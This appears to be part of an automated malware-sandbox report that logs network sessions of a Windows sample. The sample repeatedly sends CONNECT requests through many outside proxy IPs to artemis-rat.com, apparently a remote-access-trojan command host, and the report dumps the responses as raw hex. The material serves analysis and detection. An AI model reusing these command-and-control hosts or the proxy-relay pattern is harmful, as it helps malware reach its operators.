                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                                              Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.4497675.135.83.214807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.876545906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.181998968 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.44981666.29.128.241346337284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.883095980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.368257999 CET24INHTTP/1.1 200 #string


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449851104.21.66.184807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.893383980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.051975965 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.44976647.114.101.5788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.893522024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.214586020 CET334INHTTP/1.1 400 Bad Request
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 204
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.44981538.162.25.8031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.894395113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.630072117 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.449938200.111.182.64437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.900996923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.44974093.90.212.241537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.901778936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.449939200.111.182.64437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.902626038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.449940200.111.182.64437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.903331995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.449942200.111.182.64437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.903908968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449860104.16.105.146807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.910449982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.064872026 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.44982938.162.0.9531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.913280964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.331362009 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.44979439.107.33.25480907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.942591906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.258737087 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                              Mar 11, 2024 08:37:17.258934975 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.44975381.91.139.76807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.950176001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.546020985 CET19INHTTP/1.1 200 OK
                                              Mar 11, 2024 08:37:17.555825949 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 ac 92 b5 b1 bb d1 bb e2 a1 30 c1 b8 64 fc d6 dc 71 19 4b eb 15 ad 96 c6 af b3 ac 13 57 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: e0dqKW*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:18.084058046 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee b4 ad 6c 7d 4f 43 b1 92 f8 5f 39 60 6e a9 82 60 f3 1d f8 be a2 e8 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                              Data Ascii: C?el}OC_9`n`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                              Mar 11, 2024 08:37:18.084112883 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                              Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                              Mar 11, 2024 08:37:18.084388971 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                              Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                              Mar 11, 2024 08:37:18.084398031 CET238INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
